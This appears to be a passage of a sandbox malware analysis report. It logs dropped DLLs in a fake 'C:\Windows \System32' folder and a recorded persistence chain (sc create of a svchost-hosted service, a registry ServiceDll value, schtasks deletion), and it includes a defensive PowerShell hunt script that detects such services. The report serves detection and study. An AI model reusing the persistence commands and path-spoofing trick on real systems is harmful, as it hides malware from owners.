    Source: libiconv-2.dll.31.dr | Static PE information: section name: /19
    Source: libiconv-2.dll.31.dr | Static PE information: section name: /31
    Source: libiconv-2.dll.31.dr | Static PE information: section name: /45
    Source: libiconv-2.dll.31.dr | Static PE information: section name: /57
    Source: libiconv-2.dll.31.dr | Static PE information: section name: /70
    Source: libiconv-2.dll.31.dr | Static PE information: section name: /81
    Source: libiconv-2.dll.31.dr | Static PE information: section name: /92
    Source: libintl-9.dll.31.dr | Static PE information: section name: .xdata
    Source: libintl-9.dll.31.dr | Static PE information: section name: /4
    Source: libintl-9.dll.31.dr | Static PE information: section name: /19
    Source: libintl-9.dll.31.dr | Static PE information: section name: /31
    Source: libintl-9.dll.31.dr | Static PE information: section name: /45
    Source: libintl-9.dll.31.dr | Static PE information: section name: /57
    Source: libintl-9.dll.31.dr | Static PE information: section name: /70
    Source: libintl-9.dll.31.dr | Static PE information: section name: /81
    Source: libintl-9.dll.31.dr | Static PE information: section name: /92
    Source: libwinpthread-1.dll.31.dr | Static PE information: section name: .xdata
    Source: x338625.dat.31.dr | Static PE information: section name: .fptable
    Source: usvc.dat.31.dr | Static PE information: section name: _RDATA
    Source: usvc.dat.31.dr | Static PE information: section name: .fptable
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C51551B8 push es; retf | 34_2_00007FF9C5158447
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C5158341 push es; retf | 34_2_00007FF9C5158447
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C53B46DC push ds; retf | 34_2_00007FF9C53B474F
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C53B7BD4 push esi; ret | 34_2_00007FF9C53B7BD7
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C54F711E pushfd ; iretd | 34_2_00007FF9C54F7121
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C54F61CC pushad ; iretd | 34_2_00007FF9C54F6251
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C5750080 push esp; iretd | 34_2_00007FF9C5750139
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C57537F0 push eax; retf | 34_2_00007FF9C5753889
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C57537EB push eax; retf | 34_2_00007FF9C5753889
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C575000B push esp; iretd | 34_2_00007FF9C5750139
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C5753840 push eax; retf | 34_2_00007FF9C5753889
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C58B612E push esp; retf | 34_2_00007FF9C58B6139
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C5B97050 push ebx; ret | 34_2_00007FF9C5B9BE7A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C5B7746E push eax; iretd | 34_2_00007FF9C5B7747D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FF9C5B77430 pushad ; iretd | 34_2_00007FF9C5B7746D
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_649487B2 push r11; ret | 46_2_649487ED
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_660224A8 push rax; retf | 46_2_660224B1
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6829984B push 00000000h; retf | 46_2_68299850
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_682970AC push rax; iretd | 46_2_682970AD
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6829998B push 00000000h; ret | 46_2_68299990
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6829999B push 00000000h; iretd | 46_2_682999A0
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6829AA73 push 00000000h; ret | 46_2_6829AA78
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6829ABBB push 00000000h; retf | 46_2_6829ABC0
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6829ABB3 push 00000000h; ret | 46_2_6829ABB8
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_6829A7AB push 00000000h; iretd | 46_2_6829A7B0
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CE3C2B8 push 050001C2h; retn 0001h | 46_2_00007FFA2CE3C2C5
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CE3C2D0 push 680001C2h; retn 0001h | 46_2_00007FFA2CE3C2D5
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CE3C2C8 push 680001C2h; retn 0001h | 46_2_00007FFA2CE3C2CD

    Persistence and Installation Behavior

    Source: C:\Windows\System32\reg.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters ServiceDll C:\Windows\System32\x338625.dat
    Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\System32\console_zero.exe
    Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows \System32\printui.exe
    Source: C:\Windows\System32\xcopy.exe | File created: C:\Windows \System32\printui.exe
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libcurl.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\vcruntime140d.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libiconv-2.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libcrypto-3-x64.dll
    Source: C:\Windows\System32\xcopy.exe | File created: C:\Windows \System32\x249569.dat
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libssl-3-x64.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\console_zero.exe
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\x338625.dat
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\usvc.dat
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libwinpthread-1.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libintl-9.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\zlib1.dll
    Source: C:\Program Files\7-Zip\7zFM.exe | File created: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\ucrtbased.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libpq.dll

    Boot Survival

    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\reg.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
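The Persistence and Installation Behavior and Boot Survival sections above record the whole persistence chain: sc.exe creates service x338625 with binPath svchost.exe -k DcomLaunch, reg.exe sets Parameters\ServiceDll to C:\Windows\System32\x338625.dat, and xcopy.exe stages printui.exe and x249569.dat under "C:\Windows \System32\" (a directory named Windows followed by a space, which mimics the trusted system path). The script below is an added hunt query for a live host, not code from the report or the sample. It walks every service key and flags ServiceDll values that do not end in .dll, are missing on disk, or fail Authenticode validation, and any ImagePath or ServiceDll that passes through a trailing-space Windows directory. The function name and the flagging rules are mine; on the host in this report the x338625 entry would be flagged on its file extension alone.

```powershell
# Added hunt script (not from the report or the sample). Assumes a live Windows host
# where the Services hive and the referenced files are readable; the key path is a
# parameter so it can be pointed at a hive mounted with reg.exe load instead.

function Find-SuspiciousServiceDll {
    param([string]$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services')

    foreach ($svc in Get-ChildItem -Path $ServicesKey -ErrorAction SilentlyContinue) {
        $props     = Get-ItemProperty -Path $svc.PSPath -ErrorAction SilentlyContinue
        $imagePath = [string]$props.ImagePath
        $params    = Get-ItemProperty -Path "$($svc.PSPath)\Parameters" -Name ServiceDll -ErrorAction SilentlyContinue
        $dll       = [string]$params.ServiceDll
        $hosted    = $imagePath -match 'svchost\.exe'
        if (-not $dll -and -not $hosted) { continue }   # plain EXE services are out of scope here

        $reasons = @()
        # "C:\Windows \System32\..." : a Windows directory with a trailing space mimics the trusted path.
        if (($imagePath + '|' + $dll) -match '\\Windows \\') {
            $reasons += 'path through a "Windows " directory (trailing space)'
        }
        if ($dll) {
            $expanded = [Environment]::ExpandEnvironmentVariables($dll)
            if ($expanded -notmatch '\.dll$') { $reasons += 'ServiceDll does not end in .dll' }
            if (-not (Test-Path -LiteralPath $expanded)) {
                $reasons += 'ServiceDll missing on disk'
            } else {
                # Catalog-signed Windows DLLs report Valid here; anything else deserves a look.
                $sig = Get-AuthenticodeSignature -LiteralPath $expanded
                if ($sig.Status -ne 'Valid') { $reasons += "ServiceDll signature status $($sig.Status)" }
            }
        } elseif ($hosted) {
            $reasons += 'svchost-hosted service without a ServiceDll'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Service    = $svc.PSChildName
                ImagePath  = $imagePath
                ServiceDll = $dll
                Reasons    = ($reasons -join '; ')
            }
        }
    }
}

Find-SuspiciousServiceDll | Sort-Object Service | Format-Table -AutoSize -Wrap
```

Run it elevated so every Parameters key and every referenced file is readable. The report writes to ControlSet001; CurrentControlSet is the link to the active control set on a running host, which is why the default points there. The schtasks /delete entry above is the cleanup side of the same chain: once the service exists the sample no longer needs the console_zero scheduled task, so a host where the task is gone but the service remains is still infected.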

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (19 times)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (15 times)
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
